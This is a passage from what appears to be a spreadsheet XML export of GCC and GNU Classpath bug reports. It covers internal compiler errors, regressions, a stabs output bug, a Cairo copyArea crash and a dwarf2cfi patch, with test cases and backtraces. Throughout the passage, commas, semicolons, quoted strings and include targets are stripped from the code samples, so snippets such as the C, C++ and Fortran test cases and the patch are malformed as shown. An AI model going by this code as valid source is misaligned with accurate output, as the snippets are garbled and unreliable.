0x5b4f0b lto_file_finalize
	../../gcc/lto/lto.c:2236
0x5b4f0b lto_create_files_from_ids
	../../gcc/lto/lto.c:2246
0x5b4f0b lto_file_read
	../../gcc/lto/lto.c:2287
0x5b4f0b read_cgraph_and_symbols
	../../gcc/lto/lto.c:2992
0x5b4f0b lto_main()
	../../gcc/lto/lto.c:3462
$ cat 1.ii
namespace std {
class ios_base {
  struct A {}
  class __attribute((__abi_tag__(cxx11))) failure : A {}
} a
}
$ cat 2.ii
namespace std {
template  class Trans_NS___cxx11_basic_ostringstream
class ios_base {
  class __attribute((__abi_tag__(cxx11))) failure {
    virtual char m_fn2()
  }
}
class B : virtual ios_base {}
template  class Trans_NS___cxx11_basic_ostringstream : B {
public:
  void m_fn1()
}
}
class A {
public:
  A(int) {
    std::Trans_NS___cxx11_basic_ostringstream a
    a.m_fn1()
  }
}
int b
void fn1() { (A(b)) }</t>
  </si>
  <si>
    <t>GCC-3532</t>
  </si>
  <si>
    <t>mips stabs are emitted wrongly for current binutils</t>
  </si>
  <si>
    <t>mips_output_lineno emits stabn directives like this:
$LM5:
        .stabn  6807$LM5
But now that current binutils have MIPS_STABS_ELF turned on they
expect the address to be relative (i.e. $LM5-main).
Release:
gcc-3.0
Environment:
Native compiler for mipsel-linux or cross from i386-linux to mipsel-linux.</t>
  </si>
  <si>
    <t>GCC-1975</t>
  </si>
  <si>
    <t>ICE for -O2 compile of nested throw in nested default/switch/conditional/destructor.</t>
  </si>
  <si>
    <t>Throwing an exception (that has or inherits an explicit
destructor) from within a default switch case follows
another case with an arbitrary throw statement where that
switch statement is nested within a conditional and that
conditional is contained in an arbitrary class destructor
produces an internal compiler error when compiling with -O2.
Please see the attached test program for a more detailed 
description.
Release:
gcc-3_0-branch 2001-02-13
Environment:
Linux Redhat 7.0 2.2.16
How-To-Repeat:
c++ -O2 -c test.cpp</t>
  </si>
  <si>
    <t>bumgard</t>
  </si>
  <si>
    <t>CLASSPATH-29419</t>
  </si>
  <si>
    <t>CairoGraphics.copyArea() problem</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #28769 +++
+++ This bug was initially created as a clone of Bug #28719 +++
Sometimes copyArea() fails with an exception like this:
** ERROR **: file gnu_java_awt_peer_gtk_CairoSurface.c: line 300  
(Java_gnu_java_
awt_peer_gtk_CairoSurface_copyAreaNative2): assertion failed: (temp != NULL)
aborting...
java.lang.InternalError
    at gnu.java.awt.peer.gtk.CairoSurface.copyAreaNative2(Native Method)
    at gnu.java.awt.peer.gtk.CairoSurface.copyAreaNative(CairoSurface.java:323)
    at  
gnu.java.awt.peer.gtk.CairoSurfaceGraphics.copyAreaImpl(CairoSurfaceGraphi
cs.java:92)
    at  
gnu.java.awt.peer.gtk.CairoGraphics2D.copyArea(CairoGraphics2D.java:1245)
    at javax.swing.JViewport.paintBackingStore(JViewport.java:840)
    at javax.swing.JViewport.paint(JViewport.java:495)
    at javax.swing.JComponent.paintChildren(JComponent.java:1976)
    at javax.swing.JComponent.paint(JComponent.java:1844)
    at javax.swing.JComponent.paintDoubleBuffered(JComponent.java:2331)
    at javax.swing.JComponent.paintImmediately2(JComponent.java:2260)
    at javax.swing.JComponent.paintImmediately(JComponent.java:2112)
    at javax.swing.JComponent.paintImmediately(JComponent.java:2138)
    at javax.swing.RepaintManager.paintDirtyRegions(RepaintManager.java:580)
    at javax.swing.RepaintManager$RepaintWorker.run(RepaintManager.java:157)
    at java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:200)
    at java.awt.EventQueue.dispatchEvent(EventQueue.java:609)
    at java.awt.EventDispatchThread.run(EventDispatchThread.java:85)
Abort
I set this to major because when it happens it makes an application crash.</t>
  </si>
  <si>
    <t>GCC-2709</t>
  </si>
  <si>
    <t>Ice in remove_unnecessary_notes (gcc 2.95 regression)</t>
  </si>
  <si>
    <t>The following simple legal source t3.C causes an Internal compiler error in
remove_unnecessary_notes at emit-rtl.c: 2883 when compiled by gcc
3.0 20010501 (prerelease). If the using namespace directive is
removed the compiler no longer crashes. 
The code exposes a g++ 3.0 regression with respect to gcc 2.95.2.
Release:
3.0 20010501 (prerelease)
Environment:
System: Linux kiste 2.4.3 #35 Sat Mar 31 22:08:25 CEST 2001 i686 unknown
Architecture: i686
SuSE 7.1
Glibc 2.2
GNU ld 2.11.90.0.4
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix --enable-long-long --enable-languages=cc++f77objc
How-To-Repeat:
Source code t3.C
namespace ns
{
class A {}
} //namespace ns
void f()
{
  using namespace ns
}
Compiling the code by gcc 3.0:
g++ -v t3.C -W -Wall -c
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.0/specs
Configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix --enable-long-long --enable-languages=cc++f77objc
Thread model: posix
gcc version 3.0 20010501 (prerelease)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.0/cc1plus -v -D__GNUC__=3 -D__GNUC_MINOR__=0 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__STDC_HOSTED__=1 -W -Wall -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ t3.C -D__GNUG__=3 -D_GNU_SOURCE -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -quiet -dumpbase t3.C -W -Wall -version -o /tmp/ccK2mr8J.s
GNU CPP version 3.0 20010501 (prerelease) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.0 20010501 (prerelease) (i686-pc-linux-gnu)
	compiled by GNU C version 3.0 20010501 (prerelease).
#include ... search starts here:
#include  search starts here:
 /usr/local/include/g++-v3
 /usr/local/include/g++-v3/i686-pc-linux-gnu
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.0/include
 /usr/local/i686-pc-linux-gnu/include
 /usr/include
End of search list.
t3.C: In function `void f()':
t3.C:9: Internal compiler error in remove_unnecessary_notes at emit-rtl.c:2883
Please submit a full bug report with preprocessed source if appropriate.
See  for instructions.
Compiling the code by gcc 2.95.2: 
/usr/bin/g++ -v t3.C -W -Wall -c
Reading specs from /usr/lib/gcc-lib/i486-suse-linux/2.95.2/specs
gcc version 2.95.2 19991024 (release)
 /usr/lib/gcc-lib/i486-suse-linux/2.95.2/cpp -lang-c++ -v -D__GNUC__=2 -D__GNUG__=2 -D__GNUC_MINOR__=95 -D__cplusplus -D__ELF__ -Dunix -D__i386__ -Dlinux -D__ELF__ -D__unix__ -D__i386__ -D__linux__ -D__unix -D__linux -Asystem(posix) -D__EXCEPTIONS -W -Wall -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ -Di486 -D__i486 -D__i486__ t3.C /tmp/ccdLOLmL.ii
GNU CPP version 2.95.2 19991024 (release) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/include/g++
 /usr/local/include
 /usr/lib/gcc-lib/i486-suse-linux/2.95.2/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
 /usr/lib/gcc-lib/i486-suse-linux/2.95.2/../../../../i486-suse-linux/include
End of omitted list.
 /usr/lib/gcc-lib/i486-suse-linux/2.95.2/cc1plus /tmp/ccdLOLmL.ii -quiet -dumpbase t3.cc -W -Wall -version -o /tmp/ccWxIbwo.s
GNU C++ version 2.95.2 19991024 (release) (i486-suse-linux) compiled by GNU C version 2.95.2 19991024 (release).
 /usr/i486-suse-linux/bin/as -V -Qy -o t3.o /tmp/ccWxIbwo.s
GNU assembler version 2.10.91 (i486-suse-linux) using BFD version 2.10.0.33</t>
  </si>
  <si>
    <t>GCC-50195</t>
  </si>
  <si>
    <t>[4.7 Regression] Linking time error with -fast-math -O0</t>
  </si>
  <si>
    <t>Following test fails in linking if compiled with ffast-math and O0
but it compiled successfully with ffast-math and O2. Also no problem
if -lm is added.
$ cat t.c
#include 
float foo(float x)
{
  float y = 0
  while (x &gt; 0.00000001) {
    y += x*x*x*x*x*x*x*x*x*x*x*x*x
    x = x/2
  }
  return y
}
int main (int argc char    *argv[])
{
 float y = atoi(argv[1])
 printf(%f\n foo(y))
 return 0
}
$ gcc  -ffast-math -O0   t.c
/tmp/cccA1sUB.o: In function `foo':
t.c:(.text+0x2c): undefined reference to `powf'
collect2: error: ld returned 1 exit status
$ gcc  -ffast-math -O2   t.c
$ ./a.out 5
1220852096.000000
FE with -ffast-math replaced x*x*...*x with __builtin_powf. Later with
-O2 this call is replaced back into multiplications in sincos phase.
The stability with -O0 is because sincos phase doesn't work on -O0.
I think we must avoid doing this optimization in FE and turn off
-ffast-math if -O0 is used. 
From Richard Guenther:
No I think we should avoid most of the builtin related folding at -O0.</t>
  </si>
  <si>
    <t>vbyakovl23</t>
  </si>
  <si>
    <t>GCC-16675</t>
  </si>
  <si>
    <t>[4.0 Regression] Null parameter values for anonymous constructor invocation require explicit cast</t>
  </si>
  <si>
    <t>[richardl@conundrum src]$ rpm -qa | grep gcj
libgcj-3.4.0-7
libgcj-devel-3.4.0-7
The following program fails to compile with gcj:
public class Test {
    public Test(Object obj) { }
    public void someTestMethod() {
        new Test(null) { }
    }
    public void someTestMethod2() {
        new Test((Object) null) { }
    }
}
[richardl@conundrum tmp]$ gcj -C Test.java
Test.java: In class `Test':
Test.java: In method `Test.someTestMethod()':
Test.java:4: error: No constructor matching `(Testvoid)' found in class `Test'.
       public void someTestMethod() {
                                     ^
Test.java: In class `Test$1':
Test.java: In constructor `(Testvoid)':
Test.java:5: error: Can't find constructor `Test$1(V)' in type `Test$1'.
           new Test(null) { }
               ^
2 errors
This compiles fine with javac. The workaround is to cast the null as shown in
the second test method.</t>
  </si>
  <si>
    <t>richardl</t>
  </si>
  <si>
    <t>GCC-34692</t>
  </si>
  <si>
    <t>[4.2 regression] Internal error with pragma in macro</t>
  </si>
  <si>
    <t>The following testcase triggers an internal error in the preprocessor
since GCC 4.2.0:
================================
#define FOO(expr) (#expr)
FOO(
#pragma GCC diagnostic
)
================================
bug.c:5:1: internal error: unspellable token PRAGMA
bug.c:5:1: internal error: unspellable token PRAGMA_EOL
bug.c:3: error: expected identifier or '(' before string constant
This is similar to PR34602 but not yet fixed on mainline.</t>
  </si>
  <si>
    <t>GCC-26145</t>
  </si>
  <si>
    <t>memory leak in loop unswitching.</t>
  </si>
  <si>
    <t>Hi
Noticed a  memory leak in tree-ssa-loop-unswitch.c in routine tree_unswitch_single_loop() function.
I'll submit a patch to fix this leak.</t>
  </si>
  <si>
    <t>GCC-59686</t>
  </si>
  <si>
    <t>Non-constexpr pointers accepted in constant expressions</t>
  </si>
  <si>
    <t>int main
{
    static const int x = 5
    const int * const y = 
    static_assert(y )
}
clang rejects this gcc accepts.</t>
  </si>
  <si>
    <t>GCC-54832</t>
  </si>
  <si>
    <t>[4.8 Regression] [OOP] Type-bound operator not picked up with RESULT variable</t>
  </si>
  <si>
    <t>Reported by Damian Rouson at:
http://gcc.gnu.org/ml/fortran/2012-10/msg00032.html
Test case:
module integrand_module
  type abstract :: integrand
  contains
    procedure(t_interface) deferred :: t
    procedure(assign_interface) deferred :: assign
    procedure(times_interface) deferred :: times
    generic :: operator(*) =&gt; times
    generic :: assignment(=) =&gt; assign
  end type
  abstract interface
    function t_interface(this) result(dState_dt)
      import :: integrand
      class(integrand) intent(in)  :: this
      class(integrand) allocatable :: dState_dt
    end function
    function times_interface(lhsrhs)
      import :: integrand
      class(integrand) intent(in)  :: lhs
      class(integrand) allocatable :: times_interface
      real intent(in)  :: rhs
    end function
    subroutine assign_interface(lhsrhs)
      import :: integrand
      class(integrand) intent(in)    :: rhs
      class(integrand) intent(inout) :: lhs
    end subroutine
  end interface
contains
  subroutine integrate(modeldt)
    class(integrand) :: model
    real dt
    model = model%t()*dt
  end subroutine
end module 
While 4.7 compiles it cleanly 4.8 gives:
    model = model%t()*dt
            1
Error: Operands of binary numeric operator '*' at (1) are CLASS(integrand)/REAL(4)</t>
  </si>
  <si>
    <t>GCC-59082</t>
  </si>
  <si>
    <t>[4.7/4.8 Regression] ICE with duplicate (virtual) base</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since GCC 4.2.0:
================================
struct A {}
struct B : virtual A A {}
A foo(const B &amp;b)
{
  return b
}
================================
bug.cc:3:23: error: duplicate base type 'A' invalid
 struct B : virtual A A {}
                       ^
bug.cc: In function 'A foo(const B&amp;)':
bug.cc:7:10: internal compiler error: Segmentation fault
   return b
          ^
0xb2a93f crash_signal
        ../../gcc/gcc/toplev.c:334
0x618b2d contains_struct_check
        ../../gcc/gcc/tree.h:2819
0x618b2d build_vfield_ref(tree_node* tree_node*)
        ../../gcc/gcc/cp/class.c:639
0x61816b build_base_path(tree_code tree_node* tree_node* int int)
        ../../gcc/gcc/cp/class.c:429
0x553a0c convert_like_real
        ../../gcc/gcc/cp/call.c:6108
0x552e1e convert_like_real
        ../../gcc/gcc/cp/call.c:6086
0x55491c build_over_call
        ../../gcc/gcc/cp/call.c:6944
0x550f3e build_new_method_call_1
        ../../gcc/gcc/cp/call.c:7814
0x550f3e build_new_method_call(tree_node* tree_node* vec** tree_node* int tree_node** int)
        ../../gcc/gcc/cp/call.c:7884
0x551e87 build_special_member_call(tree_node* tree_node* vec** tree_node* int int)
        ../../gcc/gcc/cp/call.c:7441
0x553223 build_temp
        ../../gcc/gcc/cp/call.c:5784
0x553223 convert_like_real
        ../../gcc/gcc/cp/call.c:6128
0x5576d9 perform_implicit_conversion_flags(tree_node* tree_node* int int)
        ../../gcc/gcc/cp/call.c:9019
0x6853c3 check_return_expr(tree_node* bool*)
        ../../gcc/gcc/cp/typeck.c:8538
0x6c4bde finish_return_stmt(tree_node*)
        ../../gcc/gcc/cp/semantics.c:798
0x64d726 cp_parser_jump_statement
        ../../gcc/gcc/cp/parser.c:10590
0x64d726 cp_parser_statement
        ../../gcc/gcc/cp/parser.c:9284
0x64dcb9 cp_parser_statement_seq_opt
        ../../gcc/gcc/cp/parser.c:9654
0x64de2e cp_parser_compound_statement
        ../../gcc/gcc/cp/parser.c:9608
0x6614cb cp_parser_function_body
        ../../gcc/gcc/cp/parser.c:18461
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-35435</t>
  </si>
  <si>
    <t>[4.2 regression] ICE with attribute tls_model in typedef</t>
  </si>
  <si>
    <t>The following (valid?) code snippet triggers an ICE since GCC 3.3:
==============================================================
typedef int X __attribute__((tls_model(initial-exec)))
==============================================================
bug.c:1: internal compiler error: tree check: expected var_decl have type_decl in handle_tls_model_attribute at c-common.c:5936
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-82795</t>
  </si>
  <si>
    <t>[7/8 Regression] ICE in predicate_mem_writes at tree-if-conv.c:2251</t>
  </si>
  <si>
    <t>gcc-8.0.0-alpha20171029 snapshot (r254205) ICEs when compiling the following snippet w/ -mavx2 -O3 or -mavx2 -Ofast:
void
sj (int qh int rn int *by)
{
  for ()
    if (qh != 0)
      {
        int dc
        for (dc = 0 dc &lt; 17 ++dc)
          {
            int nn
            nn = (rn != 0) ? qh : dc
            if (nn != 0)
              qh = nn
            else
              qh = (qh != 0) ? *by : dc
          }
      }
}
% gcc-8.0.0-alpha20171029 -mavx2 -O3 -w -c w6osxlfx.c
during GIMPLE pass: ifcvt
w6osxlfx.c: In function 'sj':
w6osxlfx.c:2:1: internal compiler error: in predicate_mem_writes at tree-if-conv.c:2251
 sj (int qh int rn int *by)
 ^~
0x5dd228 predicate_mem_writes
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20171029/work/gcc-8-20171029/gcc/tree-if-conv.c:2251
0x5dd228 combine_blocks
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20171029/work/gcc-8-20171029/gcc/tree-if-conv.c:2377
0xcd7337 tree_if_conversion(loop*)
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20171029/work/gcc-8-20171029/gcc/tree-if-conv.c:2885
0xcd810e execute
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20171029/work/gcc-8-20171029/gcc/tree-if-conv.c:2963</t>
  </si>
  <si>
    <t>GCC-4886</t>
  </si>
  <si>
    <t>Solaris largefile support for fopen removed by include/g++-v3/bits/std_cstdio.h</t>
  </si>
  <si>
    <t>When compiling on Solaris for files &gt; 2 Gigs the flag -D_FILE_OFFSET_BITS=64 and -D_LARGEFILE_SOURCE cause the Solaris supplied /usr/include/stdio.h to create define fopen as fopen64 using a macro.
This macro is undefined by the gcc include/g++-v3/bits/.std_cstdio.h
Thus any attempt to open a largefile in compiled code will fail on execution with an error Value too large for defined data type. Truss will show fopen being called rather than fopen64.
Release:
unknown
Environment:
Solaris 8.0 
gcc 3.0.2
How-To-Repeat:
Try the following code on a large file &gt; 2 Gigs
g++ `LFS_CLFAGS` -o junk junk.c 
#include 
main()
{
  FILE *fp = fopen(reallybigfile.genrb)
  if (fp==NULL) perror(fopen)
}
You will get when you run 
fopen: Value too large for defined data type</t>
  </si>
  <si>
    <t>GCC-42055</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE with ambiguous template specialization</t>
  </si>
  <si>
    <t>The following invalid testcase triggers an ICE on trunk:
===========================================
template void foo(T T)
template void foo(T int)
template void foo(int int)
===========================================
bug.cc:5:15: error: ambiguous template specialization 'foo' for 'void foo(int int)'
bug.cc:5:27: internal compiler error: Segmentation fault
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-49686</t>
  </si>
  <si>
    <t>[4.7 Regression] CFI notes are missed for delayed slot</t>
  </si>
  <si>
    <t>Many EH tests fail on SH after the recent dwarf2 clean up.  These
failures went away with -fno-delayed-branch.  A tiny testcase is
int foo (int a)
{
  if (a)
    bar ()
  return 1
}
and with -O1 -fexceptions -fnon-call-exceptions its assember
output of the new compiler starts like
foo:
.LFB0:
	tst	r4r4
	bt/s	.L2
	sts.l	pr@-r15
while the old compiler outputs CFI for the last frame related
insn sts.l pr@-r15 in the delayed slot:
foo:
.LFB0:
	tst	r4r4
.LCFI0:
	bt/s	.L2
	sts.l	pr@-r15
It seems that dwarf2out_frame_debug emits CFI notes at the middle
of the elements of SEQUENCE and they were lost.  The patch below
works for me.
--- ORIG/trunk/gcc/dwarf2cfi.c	2011-07-09 14:42:50.000000000 +0900
+++ trunk/gcc/dwarf2cfi.c	2011-07-09 14:46:18.000000000 +0900
@@ -217011 +217010 @@ dwarf2out_frame_debug_expr (rtx expr)
    sets SP or FP (adjusting how we calculate the frame address) or saves a
    register to the stack.  If INSN is NULL_RTX initialize our state.
-   If AFTER_P is false we're being called before the insn is emitted
-   otherwise after.  Call instructions get invoked twice.  */
+   Notes are inserted at WHERE.  Call instructions get invoked twice.  */
 static void
-dwarf2out_frame_debug (rtx insn bool after_p)
+dwarf2out_frame_debug (rtx insn rtx where)
 {
   rtx note n
   bool handled_one = false
@@ -218313 +218213 @@ dwarf2out_frame_debug (rtx insn bool af
   /* Remember where we are to insert notes.  Do not separate tablejump
      insns from their ADDR_DIFF_VEC.  Putting the note after the VEC
      should be ok.  */
-  if (after_p)
+  if (insn == where)
     {
       if (!tablejump_p (insn NULL &amp;cfi_insn))
-	cfi_insn = insn
+	cfi_insn = where
     }
   else
-    cfi_insn = PREV_INSN (insn)
+    cfi_insn = where
   if (!NONJUMP_INSN_P (insn) || clobbers_queued_reg_save (insn))
     dwarf2out_flush_queued_reg_saves ()
@@ -22007 +21997 @@ dwarf2out_frame_debug (rtx insn bool af
 	 matter if the stack pointer is not the CFA register anymore but
 	 is still used to save registers.  */
       if (!ACCUMULATE_OUTGOING_ARGS)
-	dwarf2out_notice_stack_adjust (insn after_p)
+	dwarf2out_notice_stack_adjust (insn (insn == where))
       cfi_insn = NULL
       return
     }
@@ -24347 +24337 @@ create_cfi_notes (void)
       if (BARRIER_P (insn))
 	{
-	  dwarf2out_frame_debug (insn false)
+	  dwarf2out_frame_debug (insn PREV_INSN (insn))
 	  continue
         }
@@ -24697 +24687 @@ create_cfi_notes (void)
       pat = PATTERN (insn)
       if (asm_noperands (pat) &gt;= 0)
 	{
-	  dwarf2out_frame_debug (insn false)
+	  dwarf2out_frame_debug (insn PREV_INSN (insn))
 	  continue
 	}
@@ -247714 +247614 @@ create_cfi_notes (void)
 	{
 	  int i n = XVECLEN (pat 0)
 	  for (i = 1 i &lt; n ++i)
-	    dwarf2out_frame_debug (XVECEXP (pat 0 i) false)
+	    dwarf2out_frame_debug (XVECEXP (pat 0 i) PREV_INSN (insn))
 	}
       if (CALL_P (insn)
 	  || find_reg_note (insn REG_CFA_FLUSH_QUEUE NULL))
-	dwarf2out_frame_debug (insn false)
+	dwarf2out_frame_debug (insn PREV_INSN (insn))
-      dwarf2out_frame_debug (insn true)
+      dwarf2out_frame_debug (insn insn)
     }
 }</t>
  </si>
  <si>
    <t>GCC-82995</t>
  </si>
  <si>
    <t>Segmentation fault passing optional argument to intrinsic sum function</t>
  </si>
  <si>
    <t>With gfortran 7.2 on linux the following code gives a segmentation fault on the output line starting C2. Some earlier versions (before 4.9) give the answer '0' instead.
module y 
    implicit none 
contains 
    function test_sum(inputmask) 
        integer intent(in) :: input(:) 
        logical intent(in) optional :: mask(:) 
        integer :: test_sum 
            if(present(mask)) then 
                test_sum = sum(inputmask) 
            else 
                test_sum = sum(input) 
            endif 
    end function test_sum 
    function my_sum(inputmask) 
        integer intent(in) :: input(:) 
        logical intent(in) optional :: mask(:) 
        integer :: my_sum 
            my_sum = sum(inputmask) 
    end function my_sum 
end module y 
program test_my_sum 
    use y only:  my_sum test_sum 
    implicit none 
    integer :: input(3) = [123] 
    logical :: mask(3) = [.true..false..true.] 
        ! This works: 
        write(**) 'A1: ' sum(input) 
        write(**) 'A2: ' sum(inputmask) 
        ! This works: 
        write(**) 'B1: ' test_sum(input) 
        write(**) 'B2: ' test_sum(inputmask) 
        ! This works: 
        write(**) 'C1: ' my_sum(input[.true..true..true.]) 
        ! Segmentation fault or answer '0': 
        write(**) 'C2: ' my_sum(input) 
end program test_my_sum</t>
  </si>
  <si>
    <t>werner.blokbuster</t>
  </si>
  <si>
    <t>GCC-4713</t>
  </si>
  <si>
    <t>syntax error on #include commands</t>
  </si>
  <si>
    <t>bippcca: #include expects FILENAME or 
Release:
2.95.2 200002200 (Debian/GNU Linux)
Environment:
PC running Linux
How-To-Repeat:
just run using the gcc bippcca.c command</t>
  </si>
  <si>
    <t>dllau</t>
  </si>
  <si>
    <t>GCC-16580</t>
  </si>
  <si>
    <t>[4.1 only] gfortran ICE on test g77.f-torture/execute/intrinsic77.f</t>
  </si>
  <si>
    <t>$ ../gfortran -B.. -L/usr/local/obj/gcc/i686-pc-cygwin/./libgfortran/.libs -
L/usr/local/obj/gcc/i686-pc-cygwin/./libiberty intrinsic77.f -o intrinsic77.exe
assertion isym-&gt;resolve.f0 != NULL failed: 
file /usr/local/src/gcc/gcc/fortran/trans-decl.c line 890
intrinsic77.f: In function `index_of_substring':
intrinsic77.f:369: internal compiler error: Aborted
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-43040</t>
  </si>
  <si>
    <t>Wrong decl for mathbuiltins -&gt; wrong code with LTO</t>
  </si>
  <si>
    <t>gfortran -g -flto gfortran.dg/gamma_5.f90 fails when calculating gamma.
Simplified version below. Without -flto it prints:
           1   1.5000000      0.88622695
while with -flto it shows:
           1   1.5000000     -0.12078223
  integer :: n
  real :: xs
  n = 1
  xs = n + 0.5
  print * n xs gamma(xs)
  end</t>
  </si>
  <si>
    <t>GCC-2254</t>
  </si>
  <si>
    <t>Impossible to compile the qt toolkit</t>
  </si>
  <si>
    <t>Hi 
I tried to compile the latest version of qt.
The result (internal compiler error) is in the attached file.
I compiled with make &gt; file 2&gt;&amp;1 to get you this output.
Steven
Release:
unknown
Environment:
Suse linux 6</t>
  </si>
  <si>
    <t>GCC-33233</t>
  </si>
  <si>
    <t>Parent and contained procedure: Wrongly treated as generic procedures</t>
  </si>
  <si>
    <t>This is a follow up to PR30746.
While I believe the test case in PR30746 is correct I think the gfortran.dg/host_assoc_function_1.f90 test case is wrong.
(Simplified see testsuite for the full file)
MODULE m
  REAL :: x(3) = (/ 1.5 2.5 3.5 /)
CONTAINS
  SUBROUTINE s
    if (x(2) .ne. 2.5) call abort ()
  CONTAINS
    FUNCTION x(n m)
      x = REAL(n)**m
    END FUNCTION
  END SUBROUTINE s
END MODULE m
I am very much in favour of the other compilers which think the x in s refers to only the contained function x and not to the variable. gfortran somehow seems to treat the symbol x as generic symbol which means with one argument the variable and with two the function.
I would argue that the function name makes the variable inaccessible.
Using NAG's f95:
Error: host_assoc_function_1.f90 line 22: Too few arguments in reference to X
Error: host_assoc_function_1.f90 line 23: Too few arguments in reference to Z
ifort:
fortcom: Error: host_assoc_function_1.f90 line 22: A non-optional actual argument must be present when invoking a procedure with an explicit interface.   [M] [...]</t>
  </si>
  <si>
    <t>GCC-80287</t>
  </si>
  <si>
    <t>C++ crash with __attribute((may_alias))</t>
  </si>
  <si>
    <t>the following change produces a crash:
Index: libstdc++-v3/testsuite/20_util/any/assign/2.cc
===================================================================
--- libstdc++-v3/testsuite/20_util/any/assign/2.cc	(Revision 246605)
+++ libstdc++-v3/testsuite/20_util/any/assign/2.cc	(Arbeitskopie)
@@ -397 +397 @@
   X2() = default
   X2(const X2 }
   X2(X2 }
-}
+}__attribute((may_alias))
 void test01()
 {
2.cc: In constructor 'X2::X2(X2&amp;&amp;)':
2.cc:92:1: error: type variant differs by TYPE_REF_CAN_ALIAS_ALL.
 }
 ^
 &lt;pointer_type 0x7fa46d95a5e8
    type &lt;record_type 0x7fa46d95a348 X2 sizes-gimplified addressable asm_written needs-constructing type_1 type_5 type_6 BLK
        size 
        unit size 
        align 8 symtab 1838508144 alias set -1 canonical type 0x7fa46d95a348
        attributes &lt;tree_list 0x7fa46ddf1348
            purpose &lt;identifier_node 0x7fa46e044360 may_alias
                bindings 
                local bindings &gt;&gt;
        fields 
            used nonlocal decl_4 VOID file 2.cc line 38 col 1
            align 1 context  result 
           &gt; context 
        full-name struct X2
        needs-constructor X() X(constX&amp;) this=(X&amp;) n_parents=0 use_template=0 interface-unknown
        pointer_to_this  reference_to_this  chain &gt;
    asm_written static unsigned type_6 DI
    size  constant 64&gt;
    unit size  constant 8&gt;
    align 64 symtab 1838508384 alias set -1 canonical type 0x7fa46d95a5e8&gt;
 &lt;pointer_type 0x7fa46d95a690
    type &lt;record_type 0x7fa46d95a348 X2 sizes-gimplified addressable asm_written needs-constructing type_1 type_5 type_6 BLK
        size 
        unit size 
        align 8 symtab 1838508144 alias set -1 canonical type 0x7fa46d95a348
        attributes &lt;tree_list 0x7fa46ddf1348
            purpose &lt;identifier_node 0x7fa46e044360 may_alias
                bindings 
                local bindings &gt;&gt;
        fields 
            used nonlocal decl_4 VOID file 2.cc line 38 col 1
            align 1 context  result 
           &gt; context 
        full-name struct X2
        needs-constructor X() X(constX&amp;) this=(X&amp;) n_parents=0 use_template=0 interface-unknown
        pointer_to_this  reference_to_this  chain &gt;
    readonly unsigned DI
    size  constant 64&gt;
    unit size  constant 8&gt;
    align 64 symtab 0 alias set -1 canonical type 0x7fa46d95a690&gt;
2.cc:92:1: internal compiler error: verify_type failed
0x103d385 verify_type(tree_node const*)
        ../../gcc-7-20170326/gcc/tree.c:14207
0x9ef7a4 gen_type_die_with_usage
        ../../gcc-7-20170326/gcc/dwarf2out.c:24478
0x9f0f26 gen_type_die
        ../../gcc-7-20170326/gcc/dwarf2out.c:24704
0x9ec5bb gen_decl_die
        ../../gcc-7-20170326/gcc/dwarf2out.c:25371
0x9e852e gen_subprogram_die
        ../../gcc-7-20170326/gcc/dwarf2out.c:22371
0x9ebff9 gen_decl_die
        ../../gcc-7-20170326/gcc/dwarf2out.c:25284
0x9ed03e dwarf2out_decl
        ../../gcc-7-20170326/gcc/dwarf2out.c:25793
0x9eda2e dwarf2out_abstract_function
        ../../gcc-7-20170326/gcc/dwarf2out.c:21656
0x9ec716 gen_decl_die
        ../../gcc-7-20170326/gcc/dwarf2out.c:25239
0x9ed03e dwarf2out_decl
        ../../gcc-7-20170326/gcc/dwarf2out.c:25793
0x9ed4f6 dwarf2out_early_global_decl
        ../../gcc-7-20170326/gcc/dwarf2out.c:25450
0x972f35 symbol_table::finalize_compilation_unit()
        ../../gcc-7-20170326/gcc/cgraphunit.c:2613
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-27428</t>
  </si>
  <si>
    <t>[4.0/4.1 regression] ICE with goto in erroneous code</t>
  </si>
  <si>
    <t>The following invalid code snippet causes a segfault in main_block_label
in tree-cfg.c:
===========================
void foo()
{
    goto L
    if (0..) { L:  }
}
===========================
bug.c:4:9: error: too many decimal points in number
bug.c: In function 'foo':
bug.c:5: internal compiler error: Segmentation fault
Please submit a full bug report [etc.]
We ICE since GCC 4.0.0.</t>
  </si>
  <si>
    <t>GCC-12077</t>
  </si>
  <si>
    <t>[3.4 only] wcin.rdbuf()-&gt;in_avail() return value too high</t>
  </si>
  <si>
    <t>When stdin is bound to a regular file wcin.rdbuf()-&gt;showmanyc() returns the
number of bytes in the file which may be higher than the number of
characters in the file when using multibyte character sets such as utf-8.</t>
  </si>
  <si>
    <t>GCC-19254</t>
  </si>
  <si>
    <t>[3.3 Regression] Dynamically sized static multidimensional array access in constructor uses wrong address</t>
  </si>
  <si>
    <t>When inside a constructor a multidimensional array is declared whose size
